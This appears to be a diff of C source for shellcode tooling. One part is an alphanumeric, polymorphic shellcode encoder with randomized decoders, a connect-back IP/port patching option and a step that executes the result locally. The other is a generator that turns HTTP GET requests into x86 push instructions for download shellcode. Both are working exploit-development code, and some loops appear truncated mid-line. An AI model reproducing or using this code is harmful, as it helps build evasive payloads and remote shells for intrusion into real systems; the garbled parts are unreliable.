// | | + offset_half_size_decoder = 6; // | | + offset_terminating_key = 8; // | | + offset_jne_xor1 = 21; // | | + offset_size_decoder_min_1 = 24; // | | + // | | + offset_imul_key_offset1 = 14 + decoder_length_section1; // | | + offset_imul_key_offset2 = 17 + decoder_length_section1; // | | + 
offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | + offset_imul_key_offset3 = 24 + decoder_length_section1; // | | + // | | + offset_nop_slide1 = decoder_length_section1+ // | | + decoder_length_section2; // | | + offset_nop_slide2 = decoder_length_section1+ // | | + decoder_length_section2+ // | | + size_nop_slide1+ // | | + imul_instruction_length; // | | + // | | + offset_imul_instruction1 = offset_imul_instruction; // | | + offset_imul_instruction2 = offset_imul_instruction+1; // | | + offset_imul_instruction3 = offset_imul_instruction+2; // | | + offset_imul_instruction4 = offset_imul_instruction+3; // | | + // | | + // | | + offset_imul_key = offset_imul_instruction4; // | | + // | | + offset_jne_xor2 = size_decoder-1; // | | + jne_xor_negative_offset = decoder_length_section3+ // | | + decoder_length_section2+ // | | + size_nop_slide2+ // | | + imul_instruction_length+ // | | + size_nop_slide1; // | | + // | | + // | | + printf("size_decoder=0x%2X - %s\n", // | | + (UCHAR)size_decoder, ////// | | + is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | + *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | + // | | + printf("half_size_decoder=0x%2X - %s\n", // | | + (UCHAR)half_size_decoder, // | | + is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | + *(decoder+offset_half_size_decoder) = half_size_decoder; // | | + // | | + printf("offset_imul_key=0x%2X - %s\n", // | | + (UCHAR)offset_imul_key, // | | + is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | + *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | + *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | + *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | + // // | | + printf("size_decoder-1=0x%2X - %s\n", // | | + (UCHAR)size_decoder-1, // | | + is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not 
alphanumeric!!!"); // | | + *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | + // | | + printf("size_decoder+2=0x%2X - %s\n", // | | + (UCHAR)size_decoder+2, //////// | | + is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | + *(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | + // | | + *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | + *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | + *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | + // | | + *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | + '\xFF', // | | + 0); // | | + *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | + '\xFF', // | | + 1); // | | +#ifdef CONNECT_BACK_SHELLCODE // | | + ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | + if (ip_address == -1) /////////////////////////////////////////////////// | | + exit(-1); // | | + /////////////////////////////////// | | + //set shellcode with ip address and port for connect-back // | | + ///* ////////// | | + *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | + *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | + *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | +#endif ////////////////////////////////////////// | | + //*/ // | | + //set decoder with 'random' nop slides // | | + strncpy(decoder+offset_nop_slide1, //////////////////////////// | | + shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | + size_nop_slide1); // | | + strncpy(decoder+offset_nop_slide2, // | | + shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | + size_nop_slide2); /////////////////////////////// | | + // | | 
+ //set decoder with random initial key //////////////////////////////////////////// | | + *(decoder+offset_imul_key) = get_random_alnum_value();// | | + printf("initial key=0x%2X - %s\n", ////////////// | | + (UCHAR)*(decoder+offset_imul_key), // | | + is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | + // | | + ////////////// | | + // | | + //set decoder with 'random' dword pushes for registers we won't use //////////////// | | + *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | + printf("push dword1=0x%2X - %s\n", // | | + (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | + is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | + *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | + printf("push dword2=0x%2X - %s\n", // | | + (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | + is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | + *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | + printf("push dword3=0x%2X - %s\n", // | | + (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | + is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | + *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | + printf("push dword4=0x%2X - %s\n", // | | + (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | + is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | + // | | + //bugfix: this time after srand() :) // | | + xor_al1=get_random_alnum_value(); // | | + xor_al2=get_random_alnum_value(); // | | + *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | + *(decoder+OFFSET_XOR_AL1_B) = xor_al1; // | | + *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | + *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | + // | | + memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | + randomize_decoder_head(decoder, size_decoder, 
xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' + SIZE_RANDOMIZED_DECODER_HEAD); ////// | + //set first xor1 to random alnum value (this is the first byte of the encoded data) // | + xor1 = get_random_alnum_value(); // | + printf("xor1=0x%2X - %s\n", // | + (UCHAR)xor1, // | + is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | + ///////////////////////////////////////////////////////// | +RE_RUN: // | + sprintf(alnum_shellcode, "%s",decoder); // | + memset(temp_buf, 0, 3);/////////////////// | + for(i=0; ikey; // | + xor2=p_xor2_key->xor2; // | + temp_buf[0] = xor1; // | + temp_buf[1] = xor2; // | + strcat(alnum_shellcode, temp_buf); // append it to our decoder // | + xor1=key; // | + free_p_xor2_key(p_xor2_key); // free the list // | + } //get next original_byte // | + //////////////////////// | + if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | + { // | + printf("error - terminating key found in encoded shellcode. 
running again to fix\n");// | + goto RE_RUN; // | + } ///////////////////////////////////////////////////// | + *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | + *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| + *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| + *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| + strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | + (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | + 4); // | + // | + //bugfix: handle case of esp pointing to shellcode // | + if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | + { // | + // _asm{ // | + // push esp; // | + // pop eax; // | + // xor al, 0x36; // | + // xor al, 0x30; // | + // } // | + p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | + memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | + memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | + p_alnum_shellcode[0] = 'T'; // | + p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | + p_alnum_shellcode[2] = '4'; // and using other xor values // | + p_alnum_shellcode[3] = '6'; // <-- (x+6) // | + p_alnum_shellcode[4] = '4'; // // | + p_alnum_shellcode[5] = '0'; // <-- x // | + p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | + p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | + size_decoder += 6; // | + } // | + // | + printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | + printf("decoder length: %d\n%s\n", // | + size_decoder, // | + p_alnum_shellcode); // | + // | + printf("scanning alnum_shellcode 
for shellcode up to size bytes\n"); // | + found_msg = scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | + if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | + else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | + // | + if (str_is_alnum(alnum_shellcode)) // | + { // | + printf("execute shellcode locally? (hit: y and press enter): ");// | + if(tolower(getchar()) == 'y') // | + { ///////////// | + _asm // | + { // | + push p_alnum_shellcode; //////// | + pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' + //jump to head of decoder // + jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// + } ////////////// + } // + } // + else // + { /////////////// + printf("error non-alphanumeric shellcode\n"); // + } ////////////////////////////// + ///////// + // + return 0; ////// +} // +/////////////////// + +BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, + UCHAR *known_pattern, + UINT known_pattern_length, + UINT offset1, + UINT offset2, + UINT offset3) +{ + UINT offset, + i, + found; + + for (i=found=offset=0; i0;length--) { + if( + !is_alnum(str[length-1]) + ) + return 0; + } + return 1; +} + +UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) +{ + int xor_complement_1, xor_complement_2; + UCHAR two_xor_complements[3]; + + for(xor_complement_1=0; xor_complement_1 255 ? -1 : (x[3] <<= 24); + x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); + x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); + x[0] = x[0] > 255 ? 
-1 : (x[0] <<= 0);
+ dwIpAddress = x[0]+x[1]+x[2]+x[3];
+
+
+ return dwIpAddress;
+}
+
+DWORD my_htonl(DWORD dw_in)
+{
+ DWORD dw_out;
+
+ *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0);
+ *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1);
+ *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2);
+ *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3);
+
+ return dw_out;
+}
+
+void free_p_xor2_key(struct xor2_key *node)
+{
+ struct xor2_key *temp = 0;
+
+ if(node)
+ {
+ temp = node->prev;
+ while(node->next)
+ {
+ node=node->next;
+ free(node->prev);
+ }
+ free(node);
+ }
+ if(temp)
+ {
+ while(temp->prev)
+ {
+ temp=temp->prev;
+ free(temp->next);
+ }
+ free(temp);
+ }
+}
+
+struct xor2_key *choose_random_node(struct xor2_key *head)
+{
+ int num_nodes = 1, selected_node, i;
+ struct xor2_key* tail = head;
+
+ struct xor2_key* pn = NULL ;
+
+ if (!head || !head->key)
+ return 0;
+
+ while(tail->next)
+ {
+ tail = tail->next;
+ num_nodes++;
+ }
+
+ selected_node = rand()%num_nodes;
+
+ for(i=0; inext;
+
+ return head;
+}
+
+struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c)
+{
+ struct xor2_key *p_xor2_key, *p_xor2_key_head;
+ char *alnum = ALNUM_CHARSET;
+ UINT i=0,
+ z=1,
+ r=0,
+ count=0;
+ UCHAR xor2=0,
+ x=0;
+
+ p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key));
+ p_xor2_key->prev = 0;
+ p_xor2_key->next = 0;
+ p_xor2_key->key = 0;
+ p_xor2_key->xor2 = 0;
+
+ for(i=0; alnum[i]; i++)
+ {
+ for(x=0; alnum[x];x++)
+ {
+ xor2 = alnum[x];
+ if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c)
+ {
+ p_xor2_key->xor2 = xor2;
+ p_xor2_key->key = alnum[i];
+ p_xor2_key->next = malloc(sizeof(struct xor2_key));
+ p_xor2_key->next->prev = p_xor2_key;
+ p_xor2_key = p_xor2_key->next;
+ p_xor2_key->key=0;
+ p_xor2_key->xor2=0;
+ }
+ }
+ }
+
+ if(!p_xor2_key->key)
+ p_xor2_key->next = 0;
+ if (p_xor2_key->prev)
+ p_xor2_key = p_xor2_key->prev;
+ else
+ return 0;
+ free(p_xor2_key->next);
+ p_xor2_key->next=0;
+ return p_xor2_key_head;
+}
+
+UCHAR *shuffle(UCHAR str[], UINT length)
//length does not include terminating null.
+{
+ UINT last, randomNum;
+ UCHAR temporary;
+ UCHAR *output = malloc(length);
+ memcpy(output, str, length);
+ for (last = length; last > 1; last--)
+ {
+ randomNum = rand( ) % last;
+ temporary = output[randomNum];
+ output[randomNum] = output[last-1];
+ output[last-1] = temporary;
+ }
+ memcpy(str, output, length);
+ return output;
+}// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm
+
+
+UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide)
+{
+ UCHAR *prefix_substr,
+ *substr,
+ *suffix_substr,
+ *output_str;
+ UINT prefix_substr_len,
+ suffix_substr_len;
+
+
+ if(slide > substr_offset) {
+ printf("you can't slide it that far back!\n");
+ return 0;
+ }
+
+ output_str = malloc(str_len);
+ memset(output_str, 0 , str_len);
+
+ suffix_substr_len = str_len-substr_len-substr_offset;
+ suffix_substr = malloc(suffix_substr_len);
+ memset(suffix_substr, 0, suffix_substr_len);
+
+ prefix_substr_len = substr_offset;
+ prefix_substr = malloc(prefix_substr_len);
+ memset(prefix_substr, 0, prefix_substr_len);
+
+ substr = malloc(substr_len);
+ memset(substr, 0, substr_len);
+
+ strncpy(substr, str+substr_offset, substr_len);
+ strncpy(prefix_substr, str, prefix_substr_len);
+ strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len);
+
+ strncpy(output_str, prefix_substr, prefix_substr_len-slide);
+ strncpy(output_str+prefix_substr_len-slide, substr, substr_len);
+ strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide);
+ strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len);
+
+
+ free(prefix_substr);
+ free(suffix_substr);
+ free(substr);
+ return output_str;
+}
+
+UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide)
+{
+ UCHAR *prefix_substr,
+ *substr,
+ *suffix_substr,
+ *output_str;
+ UINT
prefix_substr_len,
+ suffix_substr_len;
+
+
+ if(slide > str_len-substr_len-substr_offset) {
+ printf("you can't slide it that far forward!\n");
+ return 0;
+ }
+
+ output_str = malloc(str_len);
+ memset(output_str, 0 , str_len);
+
+ suffix_substr_len = str_len-substr_len-substr_offset;
+ suffix_substr = malloc(suffix_substr_len);
+ memset(suffix_substr, 0, suffix_substr_len);
+
+ prefix_substr_len = substr_offset;
+ prefix_substr = malloc(prefix_substr_len);
+ memset(prefix_substr, 0, prefix_substr_len);
+
+ substr = malloc(substr_len);
+ memset(substr, 0, substr_len);
+
+ strncpy(substr, str+substr_offset, substr_len);
+ strncpy(prefix_substr, str, prefix_substr_len);
+ strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len);
+
+ strncpy(output_str, prefix_substr, prefix_substr_len);
+ strncpy(output_str+prefix_substr_len, suffix_substr, slide);
+ strncpy(output_str+prefix_substr_len+slide, substr, substr_len);
+ strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide);
+
+
+ free(prefix_substr);
+ free(suffix_substr);
+ free(substr);
+ return output_str;
+}
+
+UCHAR *get_nop_slide(UINT size, UINT slide)
+{ //simple alnum nop slide generator
+ UINT i, x, append_dec_eax = 0;
+ UCHAR alnum_nop[][3] = {
+ "AI", //inc ecx;dec ecx // (alnum_nop[0])
+ "BJ", //inc edx;dec edx // (alnum_nop[1])
+ "CK", //inc ebx;dec ebx // (alnum_nop[2])
+ "EM", //inc ebp;dec ebp // (alnum_nop[3])
+ "FN", //inc esi;dec esi // (alnum_nop[4])
+ "GO", //inc edi;dec edi // (alnum_nop[5]) [we don't care about eax value before the imul]
+ "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ]
+ "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all. ]
+
+ "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--.
//we can freely inc/dec esp for now +// "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account +// "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from +// "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack. +// | +//TODO: <-----------------------------------------------------------------------------------' +// push eax push eax push eax push ecx push edx +// pop eax push ecx push ecx dec esp pop edx +// push ecx pop ecx push edx inc esp push ecx +// pop ecx pop eax inc esp pop ecx pop ecx +// push edx push edx dec esp push eax push eax +// pop edx pop edx pop edx inc esp pop eax +// pop ecx dec esp . +// pop eax pop eax . +// push edx . +// pop edx etc... + }; + UCHAR *nop_slide; + nop_slide = malloc(size); + memset(nop_slide, 0, size); + if(size%2) + { + append_dec_eax = 1; + size--; + } + for(i=0; i<(size/2); i++) { + do + x = rand()%(sizeof(alnum_nop)/3); + while + ((slide==2)&&(x==6||x==7)); + strcat(nop_slide, alnum_nop[x]); + } + if(append_dec_eax) + { + strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide + } + return nop_slide; +} + +UCHAR get_random_alnum_push_dword_opcode() +{ + UCHAR alnum_push_dword_opcode[] = + { + 'P', //0x50 push eax + 'Q', //0x51 push ecx + 'R', //0x52 push edx + 'S', //0x53 push ebx + 'T', //0x54 push esp + 'U', //0x55 push ebp + 'V', //0x56 push esi + 'W' //0x57 push edi + }; + return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)]; +} + +UCHAR get_random_alnum_value() +{ + char alnum_values[] = ALNUM_CHARSET; + return alnum_values[rand()%strlen(alnum_values)]; +} + +UCHAR get_push_register_instruction(UCHAR *reg) +{ + if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax + else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx + else if (!strcmp(reg, "edx")) return 'R'; 
//0x52 push edx + else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx + else if (!strcmp(reg, "esp")) return 'T'; //0x54 push esp + else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp + else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi + else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi + else return 0; +} + +UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1) +{ + UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10}; + UCHAR instructions[11][3]; + UCHAR instruction_comments[11][28]; + UINT i,c, state; + UCHAR *output; + UCHAR *random_states; + UCHAR *p_state[5]; + + output = malloc(17); + memset(output, 0, 17); + memset(instructions, 0, 11*3); + memset(instruction_comments, 0, 11*28); + instructions[0][0] = '\x6a'; //j + instructions[0][1] = xor_al1; // + instructions[1][0] = '\x58'; //X + instructions[2][0] = '\x34'; //4 + instructions[2][1] = xor_al1; // + instructions[3][0] = '\x48'; //H + instructions[4][0] = '\x34'; //4 + instructions[4][1] = jne_xor1; // + instructions[5][0] = '\x30'; //0 + instructions[5][1] = '\x42'; //B + instructions[5][2] = size_decoder-1; // + instructions[6][0] = '\x52'; //R + instructions[7][0] = '\x52'; //R + instructions[8][0] = '\x59'; //Y + instructions[9][0] = '\x47'; //G + instructions[10][0] = '\x43'; //C + + strcat(instruction_comments[0], "push XOR_AL1"); + strcat(instruction_comments[1], "pop eax"); + strcat(instruction_comments[2], "xor al, XOR_AL1"); + strcat(instruction_comments[3], "dec eax"); + strcat(instruction_comments[4], "xor al, JNE_XOR1"); + strcat(instruction_comments[5], "xor byte ptr [edx+size], al"); + strcat(instruction_comments[6], "push edx"); + strcat(instruction_comments[7], "push edx"); + strcat(instruction_comments[8], "pop ecx"); + strcat(instruction_comments[9], "inc edi"); + strcat(instruction_comments[10], "inc ebx"); + do { + memset(p_state, 0, sizeof(UCHAR*)*5); + random_states = shuffle(states, 11); + + //.*0.*1.*2.*3.*4.*5 + 
p_state[0] = memchr(random_states, 0, 11); + if(p_state[0]) + p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states)); + if(p_state[1]) + p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states)); + if(p_state[1]) + p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states)); + if(p_state[1]) + p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states)); + if(p_state[1]) + p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states)); + + //.*[67].*8 + if(p_state[1]) + { + p_state[2] = memchr(random_states, 6, 11); + p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); + if(!p_state[3]) + { + p_state[2] = memchr(random_states, 7, 11); + p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); + } + if(p_state[3]) + { + //.*1.*[67].*[67] + if(p_state[2] && p_state[1] < p_state[2]) + p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states)); + + //.*0.*[67].*8.*1 + if(!p_state[4]) + p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); + if(!p_state[4]) + p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states)); + if(p_state[4]) + p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states)); + if(p_state[4]) + p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states)); + + //.*[67].*8.*0.*1.*[67] + if(!p_state[4]) + p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states)); + if(p_state[4]) + p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states)); + if(p_state[4]) + p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states)); + } + } + + } + while (!p_state[4]); + + for (c=state=0; state -#include -#include -#include -#include - -#define X86_PUSH \ - 0x68 - -#define X86_MOV_TO_DL(x) \ - printf("\t\"\\xb2\\x%02x\"\n", x & 0xFF); - -#define X86_MOV_TO_DX(x) \ - printf("\t\"\\x66\\xba\\x%02x\\x%02x\"\n", \ - (x & 0xFF), ((x >> 8) & 0xFF)); - -#define X86_MOV_TO_EDX(x) \ - 
printf("\t\"\\xba\\x%02x\\x%02x\\x%02x\\x%02x\"\n", \ - (x & 0xFF), ((x >> 8) & 0xFF), ((x >> 16) & 0xFF), ((x >> 24) & 0xFF)); - -void usage(char *); -int printx(char *fmt, ...); - -int main(int argc, char **argv) { - - if (argc < 2) { - usage(argv[0]); - return -1; - } - - if (argv[2][0] != '/') { - - fprintf(stderr, "filename must begin with '/' as any sane URL! (e.g. /index.html)\n"); - - return -1; - } - - if (!strcmp(argv[1], "-0")) { - - return printx("GET %s HTTP/1.0\r\n\r\n", argv[2]); - } - - if (!strcmp(argv[1], "-1")) { - - if (argc != 4) { - - fprintf(stderr, "missing , required parameter for HTTP/1.1 header! (e.g. www.tty64.org)\n"); - - return -1; - } - - return printx("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n", argv[2], argv[3]); - } - - fprintf(stderr, "%s: unknown http protocol, try -0 or -1\n", argv[1]); - - return -1; -} - -/* - * usage, display usage screen - * * basename, barrowed argv[0] - */ - -void usage(char *basename) { - - printf( - "usage: %s <-0|-1> []\n\n" - "\t -0, HTTP/1.0 GET request\n" - "\t -1, HTTP/1.1 GET request\n" - "\t , given filename (e.g. /shellcode.bin)\n" - "\t , given hostname (e.g. www.tty64.org) [required for HTTP 1.1]\n\n", - basename); - - return ; -} - -/* - * printx, fmt string. generate the shellcode chunk - * * fmt, given format string - */ - -int printx(char *fmt, ...) 
{ - va_list ap; - char buf[256], pad_buf[4], *w_buf; - int pad_length, buf_length, i, tot_length; - - memset(buf, 0x0, sizeof(buf)); - - va_start(ap, fmt); - vsnprintf(buf, sizeof(buf), fmt, ap); - va_end(ap); - - buf_length = strlen(buf); - - printf("\nURL: %s\n", buf); - printf("Header Length: %d bytes\n", buf_length); - - for (i = 1; buf_length > (i * 4); i++) { - pad_length = ((i+1)*4) - buf_length; - } - - printf("Padding Length: %d bytes\n\n", pad_length); - - tot_length = buf_length + pad_length; - - w_buf = buf; - - if (pad_length) { - - w_buf = calloc(tot_length, sizeof(char)); - - if (!w_buf) { - - perror("calloc"); - return -1; - } - - i = index(buf, '/') - buf; - - memset(pad_buf, 0x2f, sizeof(pad_buf)); - - memcpy(w_buf, buf, i); - memcpy(w_buf+i, pad_buf, pad_length); - memcpy(w_buf+pad_length+i, buf+i, buf_length - i); - } - - for (i = tot_length - 1; i > -1; i-=4) { - - printf("\t\"\\x%02x\\x%02x\\x%02x\\x%02x\\x%02x\" // pushl $0x%02x%02x%02x%02x\n", - X86_PUSH, w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i], w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i]); - } - - if (pad_length) { - - free(w_buf); - } - - // - // The EDX register is assumed to be zero-out within the shellcode. - // - - if (tot_length < 256) { - - // 8bit value - - X86_MOV_TO_DL(tot_length); - - } else if (tot_length < 655356) { - - // 16bit value - - X86_MOV_TO_DX(tot_length); - - } else { - - // 32bit value, rarely but possible ;-) - - X86_MOV_TO_EDX(tot_length); - - } - - fputc('\n', stdout); - - return 1; -} - +/* + * gen_httpreq.c, utility for generating HTTP/1.x requests for shellcodes + * + * SIZES: + * + * HTTP/1.0 header request size - 18 bytes+ + * HTTP/1.1 header request size - 26 bytes+ + * + * NOTE: The length of the selected HTTP header is stored at EDX register. + * Thus the generated MOV instruction (to EDX/DX/DL) is size-based. 
+ * + * - izik@tty64.org + */ + +#include +#include +#include +#include +#include + +#define X86_PUSH \ + 0x68 + +#define X86_MOV_TO_DL(x) \ + printf("\t\"\\xb2\\x%02x\"\n", x & 0xFF); + +#define X86_MOV_TO_DX(x) \ + printf("\t\"\\x66\\xba\\x%02x\\x%02x\"\n", \ + (x & 0xFF), ((x >> 8) & 0xFF)); + +#define X86_MOV_TO_EDX(x) \ + printf("\t\"\\xba\\x%02x\\x%02x\\x%02x\\x%02x\"\n", \ + (x & 0xFF), ((x >> 8) & 0xFF), ((x >> 16) & 0xFF), ((x >> 24) & 0xFF)); + +void usage(char *); +int printx(char *fmt, ...); + +int main(int argc, char **argv) { + + if (argc < 2) { + usage(argv[0]); + return -1; + } + + if (argv[2][0] != '/') { + + fprintf(stderr, "filename must begin with '/' as any sane URL! (e.g. /index.html)\n"); + + return -1; + } + + if (!strcmp(argv[1], "-0")) { + + return printx("GET %s HTTP/1.0\r\n\r\n", argv[2]); + } + + if (!strcmp(argv[1], "-1")) { + + if (argc != 4) { + + fprintf(stderr, "missing , required parameter for HTTP/1.1 header! (e.g. www.tty64.org)\n"); + + return -1; + } + + return printx("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n", argv[2], argv[3]); + } + + fprintf(stderr, "%s: unknown http protocol, try -0 or -1\n", argv[1]); + + return -1; +} + +/* + * usage, display usage screen + * * basename, barrowed argv[0] + */ + +void usage(char *basename) { + + printf( + "usage: %s <-0|-1> []\n\n" + "\t -0, HTTP/1.0 GET request\n" + "\t -1, HTTP/1.1 GET request\n" + "\t , given filename (e.g. /shellcode.bin)\n" + "\t , given hostname (e.g. www.tty64.org) [required for HTTP 1.1]\n\n", + basename); + + return ; +} + +/* + * printx, fmt string. generate the shellcode chunk + * * fmt, given format string + */ + +int printx(char *fmt, ...) 
